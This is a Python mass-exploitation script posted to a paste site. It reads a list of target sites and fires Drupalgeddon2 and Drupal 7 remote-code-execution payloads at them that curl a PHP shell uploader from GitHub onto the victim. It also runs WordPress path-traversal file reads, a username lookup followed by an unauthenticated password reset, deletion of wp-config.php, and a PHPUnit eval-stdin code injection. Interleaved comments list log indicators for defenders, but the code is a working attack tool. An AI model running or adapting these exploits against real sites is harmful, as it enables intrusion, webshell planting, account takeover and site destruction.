
tolol.py

a guest
Jan 28th, 2020
  1. import urllib3, requests, os, sys, re, json
  2. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  3. import base64
  4. import random
  5. import string
  6. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  7. from multiprocessing.dummy import Pool as ThreadPool
  8. from time import time as timer
  9. from platform import system
  10. from colorama import Fore
  11. from colorama import Style
  12. from pprint import pprint
  13. from colorama import init
  14. import urllib
  15. from bs4 import BeautifulSoup
  16.  
  17.  
  # Console colour/style aliases, followed by the start-up sequence: clear the
  # terminal, print the banner, prompt for a file path and read it line by line
  # into `woh`, the list that Main() later hands to the worker pool.
  18. fr = Fore.RED
  19. fc = Fore.CYAN
  20. fw = Fore.WHITE
  21. fg = Fore.GREEN
  22. sd = Style.DIM
  23. sn = Style.NORMAL
  24. sb = Style.BRIGHT
  25. try:
  26. os.system('clear')
  27. print ("""
  28. ____ ___ ______ _____ ___
  29. | \ / \ | T| T / _]
  30. | o )Y Y| |l__/ | / [_
  31. | T| O |l_j l_j| __jY _]
  32. | O || | | | | / || [_
  33. | |l ! | | | || T
  34. l_____j \___/ l__j l_____jl_____j
  35.  
  36. > Dann Kowalskyi ~ Zekkel DeBleau ~ Family Attack Cyber <
  37. """)
  38. ganteng = input('ur files => ')
  # Every line of this file is later treated as a site to contact; nothing in the
  # visible listing validates or restricts the entries.
  39. f= open(ganteng, 'r')
  40. woh = f.read().splitlines()
  41. except IOError:
  42. pass
  43. woh = list((woh))
  44.  
  # banner(): prints the ASCII-art banner. The bare `sd` expression on the next
  # line only evaluates the colorama style constant and discards it. banner() is
  # not called anywhere in the visible listing.
  45. def banner():
  46. sd
  47. print ("""
  48. ____ ___ ______ _____ ___
  49. | \ / \ | T| T / _]
  50. | o )Y Y| |l__/ | / [_
  51. | T| O |l_j l_j| __jY _]
  52. | O || | | | | / || [_
  53. | |l ! | | | || T
  54. l_____j \___/ l__j l_____jl_____j
  55.  
  56. > Zekkel AR ~ Family Attack Cyber <
  57. """)
  # Domains(url): normalises a target string into a URL. Input without "://" gets
  # "http://" prepended; anything else is returned unchanged. Bare host names are
  # therefore contacted over plain HTTP.
  58. def Domains(url):
  59.  
  60. if '://' not in url:
  61. return "http://" + url
  62. else:
  63. return url
  64.  
  # timezone(site): probe-and-drop routine against the Drupal user-registration
  # AJAX endpoint, going through the `timezone` form element.
  # Indicators a defender can match in access logs / WAF rules, all taken from the
  # requests built below:
  #   - POST to /user/register with element_parents=timezone/timezone/%23value,
  #     ajax_form=1 and _wrapper_format=drupal_ajax in the query string
  #   - form field names containing `#lazy_builder`, with `passthru` as the value
  #   - a file named sayang.php appearing in the web root or under
  #     sites/default/files, fetched with curl from a raw.githubusercontent.com URL
  # All three POSTs and both follow-up GETs are issued before the `uname` reply is
  # inspected, so a host that received these requests should be checked for
  # sayang.php regardless of what the operator's console reported.
  # Results are appended to drupal_vuln.txt. Both except branches print
  # NOT VULNERABLE, so that label also covers timeouts and every other error.
  65. def timezone(site):
  66. try:
  67. url = Domains(site)
  68. #check uname
  69. command = ('uname -a')
  70. data1 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  71. data2 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command}
  72. ambush = requests.post(data1, data=data2, timeout=5).text
  73.  
  74. #check home
  75. command2 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php')
  76. data3 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  77. data4 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command2}
  78. jembit = requests.post(data3, data=data4, timeout=5).text
  79. kontoool = requests.get(url+'/sayang.php')
  80.  
  81. #check default
  82. command3 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php')
  83. data100 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  84. data200 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command3}
  85. pepek = requests.post(data100, data=data200, timeout=5)
  86. kontiil = requests.get(url+'/sites/default/files/sayang.php')
  # "Linux" in the first reply is the only signal used to label a site vulnerable.
  87. if 'Linux' in ambush:
  88. print('{}[ {}VULNERABLE {}] {} {}{} [ {}DRUPAL 8 {}] {}[ {}TIMEZONE {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
  89. open('drupal_vuln.txt', 'a').write(url + "\n")
  90. print(' {}[ {}+ {}] {}Exploiting....' .format(fr,fc,fr,fc))
  # The literal 'Avinash Kumar Thapa' is the marker this script looks for to decide
  # that the downloaded PHP file is being served.
  91. if 'Avinash Kumar Thapa' in kontoool:
  92. print(' [ + ] Exploit Success {}/sayang.php' .format(url))
  93. open('drupal_vuln.txt', 'a').write(url+'/sayang.php')
  94.  
  95. else:
  96. print(' {}[ {}+ {}] {}Exploit Failed, Home DIR RED' .format(fc,fr,fc,fr))
  97. print(' {}[ {}i {}] {}Checking Dir Writable /sites/default/files' .format(fr,fc,fr,fc))
  98. if 'Avinash Kumar Thapa' in kontiil:
  99. print(' [ + ] Success {}/sites/default/files/sayang.php')
  100. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
  101. else:
  102. print(' {}[ {}+ {}] {}Exploit Failed ' .format(fc,fr,fc,fr))
  103. open('drupal_vuln.txt', 'a').write(url + "\n")
  104.  
  105.  
  106. else:
  107. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  108. except requests.exceptions.ConnectTimeout:
  109. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  110. except Exception as e:
  111. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  # mail(site): same registration endpoint as timezone(), but going through the
  # account `mail` element (the author's own label for it is on the next line).
  # Indicators visible in the requests built below:
  #   - POST to /user/register with element_parents=account/mail/%23value,
  #     ajax_form=1 and _wrapper_format=drupal_ajax
  #   - form field names `mail[#post_render][]` (value `passthru`), `mail[#type]`
  #     and `mail[#markup]` carrying a shell command
  #   - the same dropped file name, sayang.php, and the same marker string check
  # The download request is sent before the `uname` reply is inspected. Both except
  # branches print NOT VULNERABLE, so that label also covers timeouts and errors.
  # Mitigation is on the Drupal side: a core release in which form input can no
  # longer supply `#`-prefixed render-array keys.
  112. #DRUPALGEDDON MAIL
  113. def mail(site):
  114. try:
  115. url = Domains(site)
  116. command = ('uname -a')
  117. url1 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  118. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':command}
  119. ambush2 = requests.post(url1, data=payload, timeout=5).text
  120. url2 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  121. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php'}
  122. ambuz = requests.post(url2, data=payload2, timeout=5).text
  123. bla = requests.get(url+'/sayang.php')
  124. cekdir = url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  125. hajar = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php'}
  126. kontill = url+'/sites/default/files/sayang.php'
  127. if 'Linux' in ambush2:
  128. print('{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 8 {}] {}[ {}MAIL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
  129. print(" {} [ {}+ {}] {}Exploiting ... " .format(fr,fc,fr,fc))
  130. if 'Avinash Kumar Thapa' in bla:
  131. print(" [ + ] Exploit Success ... ")
  132. open('drupal_vuln.txt', 'a').write(url + "\n")
  133.  
  134. else:
  135. print(' {} [ {}+ {}] {}Exploit Failed, Dir RED in home Directory' .format(fc,fr,fc,fg))
  136. print(" [ + ] CHECKING In dir /sites/default/files")
  137. if 'Avinash Kumar Thapa' in kontill:
  138. print(' [ + ] Exploiting Success --> {}/sites/default/files/sayang.php')
  139. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
  140.  
  141. else:
  142. print(' {}[ {}i {}] {}Exploiting Failed, No Writable Dir' .format(fc,fr,fc,fr))
  143. open('drupal_vuln.txt', 'a').write(url + "\n")
  144.  
  145.  
  146.  
  147.  
  148. else:
  149. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  150. except requests.exceptions.ConnectTimeout:
  151. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  152. except Exception as e:
  153. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  # The triple-quoted string below holds a disabled `drupal7` check. As a bare
  # string expression it is never executed; only drupal7_1() is called from Run_Work.
  154. """
  155. def drupal7(site):
  156. url = Domains(site)
  157. verify = False
  158. header = headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
  159. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]': 'uname -a'}
  160. url2 = (url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax')
  161. ea = requests.post(url2, data=payload, headers = header, verify=verify, timeout=5).text
  162.  
  163. try:
  164. if 'Linux' in ea:
  165. print("{}{} --> {} vuln[{}] --> drupal7" .format(fg,url,fc,ea))
  166. print("[ + ] Exploiting ....")
  167. kampank = (url)
  168. open('drupal_vuln.txt', 'a').write(url + "\n")
  169.  
  170. else:
  171. print("{}{} --> {} not vuln" .format(fg,url,fr))
  172. except requests.exceptions.ConnectTimeout:
  173. print("[ i ] {}{} CONNECTION TIMEOUT" .format(fw,url))
  174. except Exception as e:
  175. #print (e)
  176. print ("{} Something was wrong !" .format(url))
  177. """
  178.  
  # upshell(site): Drupal 7 flavour of the file-drop step, using the password-reset
  # form instead of the registration form.
  # Indicators visible in the requests built below:
  #   - POST to ?q=user/password whose query string carries name[%23post_render][],
  #     name[%23markup] and name[%23type]
  #   - a follow-up POST to ?q=file/ajax/name/%23value/<form_build_id>, where the id
  #     is scraped from the first response
  #   - a GET for /sayang.php afterwards
  # Both POSTs use verify=False, i.e. TLS certificates are not checked.
  # Not called from Run_Work in the visible listing; the only reference is a
  # commented-out call inside drupal7_1().
  179. def upshell(site):
  180. url = Domains(site)
  181. print(" [ + ] Exploiting ...")
  182. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
  183. data6 = {
  184. 'form_id':'user_pass',
  185. '_triggering_element_name':'name'
  186. }
  187. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
  188. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
  189. if result2:
  190. found3 = result2.group(1)
  191. url23 = url+'?q=file/ajax/name/%23value/'+found3
  192. data1 = {'form_build_id' : found3}
  193. babi = requests.post(url23, data=data1, verify = False, timeout=5)
  194. cek = requests.get(url+'/sayang.php').text
  195. if 'Avinash Kumar Thapa' in cek:
  196. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
  197. else:
  198. print('{} [ + ] Exploiting Failed --> {}{}' .format(fg,fr,url))
  199. else:
  200. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  201.  
  # writable(site): same two-request Drupal 7 sequence as upshell(), but the
  # download is redirected to /sites/default/files/sayang.php and that path is
  # fetched afterwards. The request shapes (?q=user/password with name[%23...]
  # parameters, then ?q=file/ajax/name/%23value/<form_build_id>) are the log
  # indicators. Both except branches print NOT VULNERABLE, so that label also
  # covers timeouts and errors. Not called from Run_Work in the visible listing.
  202. def writable(site):
  203. try:
  204. url = Domains(site)
  205. print(' {}[ + ] Checking Dir Writable' .format(fg))
  206. pass
  207. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
  208. data6 = {
  209. 'form_id':'user_pass',
  210. '_triggering_element_name':'name'
  211. }
  212. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
  213. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
  214. if result2:
  215. found3 = result2.group(1)
  216. url23 = url+'?q=file/ajax/name/%23value/'+found3
  217. data1 = {'form_build_id' : found3}
  218. babi = requests.post(url23, data=data1, verify = False, timeout=5)
  219. cek = requests.get(url+'/sites/default/files/sayang.php').text
  220. if 'Avinash Kumar Thapa' in cek:
  221. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
  222. else:
  223. print('{} [ + ] Exploiting Failed, No Dir Writable--> {}' .format(fg,url))
  224. else:
  225. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  226. except requests.exceptions.ConnectTimeout:
  227. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  228. except Exception as e:
  229. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  # drupal7_1(site): the Drupal 7 routine that Run_Work actually calls. It chains a
  # `uname -a` probe with two download attempts through the password-reset form.
  # Indicators visible in the requests built below:
  #   - POST to ?q=user/password with name[%23post_render][]=system and a command in
  #     name[%23markup]
  #   - POST to ?q=file/ajax/name/%23value/<form_build_id> right after each of them
  #   - GETs for /sites/default/files/sayang.php and /sayang.php
  # The download requests are sent as soon as the first form_build_id is found,
  # before the `uname` output is examined, so the presence of sayang.php on disk is
  # the thing to check on any host that logged this sequence.
  # Every POST uses verify=False. Outcomes are appended to drupal_vuln.txt; both
  # except branches print NOT VULNERABLE, which therefore also covers errors.
  # NOTE(review): indentation was lost in this paste, so the exact nesting of the
  # if/else chain below cannot be confirmed from the listing.
  230. def drupal7_1(site):
  231. try:
  232. url = Domains(site)
  233. kentot = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=uname -a&name[%23type]=markup')
  234. data = {
  235. 'form_id':'user_pass',
  236. '_triggering_element_name':'name'
  237. }
  238. r = requests.post(kentot,data = data,verify = False,timeout = 5)
  239. result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  240. if result:
  241. found = result.group(1)
  242. url2= url + '?q=file/ajax/name/%23value/'+found
  243. data = {'form_build_id' : found}
  244. r = requests.post(url2,data = data,verify = False,timeout = 5).text
  245. kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
  246. data6 = {
  247. 'form_id':'user_pass',
  248. '_triggering_element_name':'name'
  249. }
  250. re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
  251. result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
  252. if result2:
  253. found3 = result2.group(1)
  254. url23 = url+'?q=file/ajax/name/%23value/'+found3
  255. data1 = {'form_build_id' : found3}
  256. babi = requests.post(url23, data=data1, verify = False, timeout=5)
  257. cek = requests.get(url+'/sites/default/files/sayang.php').text
  258. else:
  259. pass
  260. kentot3 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
  261. data7 = {
  262. 'form_id':'user_pass',
  263. '_triggering_element_name':'name'
  264. }
  265. re3 = requests.post(kentot3,data = data7,verify = False,timeout = 5)
  266. result3 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re3.text)
  267. if result3:
  268. found4 = result3.group(1)
  269. url234 = url+'?q=file/ajax/name/%23value/'+found4
  270. data2 = {'form_build_id' : found4}
  271. babi = requests.post(url234, data=data2, verify = False, timeout=5)
  272. cek1 = requests.get(url+'/sayang.php').text
  273. else:
  274. pass
  275.  
  # "Linux" in the reply to the file/ajax request is the vulnerability signal.
  276. if 'Linux' in r:
  277. print("{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 7 {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  278. print(" {} [ {}+ {}] {}Exploiting" .format(fr,fc,fr,fc))
  279. if 'Avinash Kumar Thapa' in cek:
  280. print("{} [ + ] Exploit Success --> {}/sites/default/files/sayang.php" .format(fg,url))
  281. open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php'+"\n")
  282.  
  283. else:
  284. print('{} [ {}+ {}] {}Exploiting Failed, {}[ {}NO DIR WRITABLE {}]' .format(fc,fr,fc,fc,fc,fr,fc))
  285. print("{} [ i ] Checking in Home Directory.." .format(fg))
  286. if 'Avinash Kumar Thapa' in cek1:
  287. print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fc, url))
  288. open('drupal_vuln.txt', 'a').write(url+'/sayang.php'+"\n")
  289.  
  290. else:
  291. print("{} [ + ] Exploit Failed DIR RED " .format(fr))
  292. open('drupal_vuln.txt', 'a').write(url+"\n")
  293. # upshell(url)
  294.  
  295. #writable(url)
  296.  
  297. else:
  298. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  299. else:
  300. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  301. except requests.exceptions.ConnectTimeout:
  302. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  303. except Exception as e:
  304. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  305. #print("{}[ i ] {}{} --> URL ERROR" .format(fw,fw,url))
  306.  
  307.  
  # enum(site): unauthenticated user-name lookup against a WordPress AJAX action.
  # It POSTs action=cs_employer_ajax_profile with cs_uid 0..4 to
  # /wp-admin/admin-ajax.php and returns the first `display_name` value found in a
  # response; wp_reset() uses the result as the login to target.
  # Log indicator: a short burst of admin-ajax.php POSTs with that action and
  # consecutive cs_uid values. TLS verification is off (verify=False).
  308. def enum(site):
  309.  
  310. try:
  311. url = Domains(site)
  312. for i in range(5):
  313. enum = urllib.parse.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
  314. data = requests.post(url + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False, timeout=3)
  315. login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
  316. for user in login:
  317. return user
  318.  
  319. except requests.exceptions.ConnectTimeout:
  320. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  321. except Exception as e:
  322. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  323.  
  # wp_spritz(site): local-file-read check against the wp-with-spritz plugin's
  # content-filter script. It requests the script with a `url=` parameter that
  # walks up to /etc/passwd and treats the root account line in the body as proof.
  # Hits are appended to the file `wp_spritz`.
  # Log indicator: GETs for wp.spritz.content.filter.php whose `url` parameter
  # contains `../` sequences or a local path. Removing the plugin closes this path.
  324. def wp_spritz(site):
  325. try:
  326. url = Domains(site)
  327. exploit = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd"
  328. blank = requests.get(url+exploit, timeout=5)
  329. if blank.status_code == 200:
  330. print ("[ + ] STATUS CODE 200OK... EXPLOITING")
  331. if 'root:x:0:0:root:/root:/bin/bash' in blank.text:
  332. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP SPRITZ {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  333. open('wp_spritz', 'a').write(url + exploit + "\n")
  334. else:
  335. print ("{}[ + ] EXPLOITING FAILED" .format(fc))
  336.  
  337. else:
  338. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  339. except requests.exceptions.ConnectTimeout:
  340. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  341. except Exception as e:
  342. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  343.  
  # ad_manager(site): file-disclosure check through a CSV-export request on
  # wp-admin/edit.php (post_type=wd_ads_ads, export=export_csv) whose `path`
  # parameter points at ../wp-config.php. "DB_NAME" in the response is taken as
  # proof; hits are appended to ad_manager.txt.
  # For a site that logged this request and returned the file, everything stored in
  # wp-config.php (database credentials, keys and salts) should be treated as
  # disclosed and rotated.
  344. def ad_manager(site):
  345. try:
  346. url = Domains(site)
  347. exploit = '/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php'
  348. blank = requests.get(url+exploit, timeout=5).text
  349. if 'DB_NAME' in blank:
  350. print("{}[ {}VULNERABLE {}] {}{} {}[ {}AD MANAGER {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  351. open('ad_manager.txt', 'a').write(url + exploit + "\n")
  352. else:
  353. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  354. except requests.exceptions.ConnectTimeout:
  355. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  356. except Exception as e:
  357. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  358.  
  359.  
  360.  
  361.  
  # backup(site): checks whether the CherryFramework theme's download_backup.php
  # answers with HTTP 200 and, if so, prompts the operator for a file name and
  # writes the response to <name>.mp3. The GET has no timeout.
  # Log indicator: unauthenticated GETs for
  # /wp-content/themes/CherryFramework/admin/data_management/download_backup.php.
  # A site that served this request should assume its backup archive was copied.
  362. def backup(site):
  363. try:
  364. url = Domains(site)
  365. exploit = '/wp-content/themes/CherryFramework/admin/data_management/download_backup.php '
  366. blank = requests.get(url+exploit, stream=True)
  367. if blank.status_code == 200:
  368. print("{}[ {}VULNERABLE {}] {}{} {}[ {}BACKUP {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  369. tai = input('name file => ')
  370. print ("{}{} Downloading File...." .format(url))
  371. with open(tai + '.mp3','wb') as f:
  372. for i in r.iter_content(1024):
  373. if i:
  374. f.write(i)
  375. f.flush
  376. else:
  377. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  378. except requests.exceptions.ConnectTimeout:
  379. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  380. except Exception as e:
  381. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  382.  
  383.  
  # wp_reset(site): unauthenticated password reset through a WordPress AJAX action.
  # It takes the login returned by enum(), then POSTs action=cs_reset_pass with
  # new_pass / confirm_new_pass set to a password hard-coded below. A 200 response
  # containing the CSS class `icon-checkmark6` is treated as success, and
  # "url|login|password" is appended to reset_success.txt.
  # Log indicator: admin-ajax.php POSTs with action=cs_reset_pass from a client
  # that just sent cs_employer_ajax_profile lookups. Any account reset this way is
  # compromised: force a new password, end its sessions and review what it changed.
  384. def wp_reset(site):
  385.  
  386. try:
  387.  
  388. url = Domains(site)
  389.  
  390. login = enum(site)
  391.  
  392. pw = "rdcl@hxr000"
  393.  
  394. reset = urllib.parse.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
  395. data = requests.post(url + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False, timeout=3)
  396.  
  397. res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
  398. for i in res:
  399. if i == str('icon-checkmark6') and data.status_code == 200:
  400. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP RESET {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  401. open('reset_success.txt', 'a').write(url + "|" + login + "|" + pw + "\n")
  402. else:
  403. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  404.  
  405. except requests.exceptions.ConnectTimeout:
  406. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  407. except Exception as e:
  408. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  409.  
  410.  
  # Arforms_config(site): this "check" is destructive. It POSTs
  # action=arf_delete_file with file_name=../../../../wp-config.php to
  # /wp-admin/admin-ajax.php, then loads /wp-admin and looks for the WordPress
  # setup form; finding it is treated as proof the config file was removed. Hits
  # are appended to arforms_del.txt.
  # Symptom on the victim side: the site suddenly serves the installer. Recovery is
  # restoring wp-config.php from backup and keeping the installer unreachable until
  # that is done; the log indicator is the arf_delete_file action with `../` in
  # file_name.
  411. def Arforms_config(site):
  412.  
  413. try:
  414.  
  415. url = Domains(site)
  416.  
  417. payload = {
  418. "action":"arf_delete_file",
  419. "file_name":"../../../../wp-config.php"
  420. }
  421.  
  422. r = requests.post(url + "/wp-admin/admin-ajax.php", data=payload, headers=headers, timeout=3)
  423.  
  424. sh = requests.get(url + "/wp-admin").text
  425. if 'id="setup" method="post" action="?step=0' in sh:
  426. print("{}[ {}VULNERABLE {}] {}{} {}[ {}ARFORMS CONFIG {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  427. open('arforms_del.txt', 'a').write(url + "\n")
  428. else:
  429. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  430. except requests.exceptions.ConnectTimeout:
  431. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  432. except Exception as e:
  433. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  434.  
  # wp_install(site): looks for an unfinished WordPress installation by requesting
  # /wp-admin/setup-config.php under four base paths and checking for the link to
  # step 1 of the installer. Matching URLs are appended to wp_install.txt.
  # Defensive reading: an installer that is still reachable should be completed or
  # removed, and requests for setup-config.php on a live site are worth alerting on.
  435. def wp_install(site):
  436.  
  437. try:
  438. url = Domains(site)
  439.  
  440. list_path = ['/','/new', '/wp', '/wordpress']
  441.  
  442. for path in list_path:
  443. check = requests.get(url + path + "/wp-admin/setup-config.php" ,headers=headers, timeout=3).text
  444. if '<a href="setup-config.php?step=1' in check:
  445. print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP INSTALL{}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
  446. open('wp_install.txt', 'a').write(url + path + "/wp-admin/setup-config.php" + "\n")
  447. else:
  448. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  449. except requests.exceptions.ConnectTimeout:
  450. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  451. except Exception as e:
  452. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  # phpunit(site): targets a web-reachable PHPUnit helper script. It POSTs PHP
  # source as the request body to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  # and treats "Linux" in the reply as proof of execution, then looks for a dropped
  # muach.php in the same directory. Hits are appended to php_unit.txt; the console
  # label for this check is LARAVEL.
  # Log indicators: any POST to eval-stdin.php, request bodies starting with `<?php`,
  # and a new muach.php under vendor/phpunit. The underlying exposure is a `vendor/`
  # tree served by the web server; keeping it outside the document root and not
  # deploying development dependencies removes the entry point.
  453. def phpunit(site):
  454. try:
  455. url = Domains(site)
  456. op = url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
  457. cekos = "<?php system('uname -a');?>"
  458. upshell = '<?php system("curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o muach.php"); ?>'
  459. b = requests.post(op, data=cekos, timeout=5).text
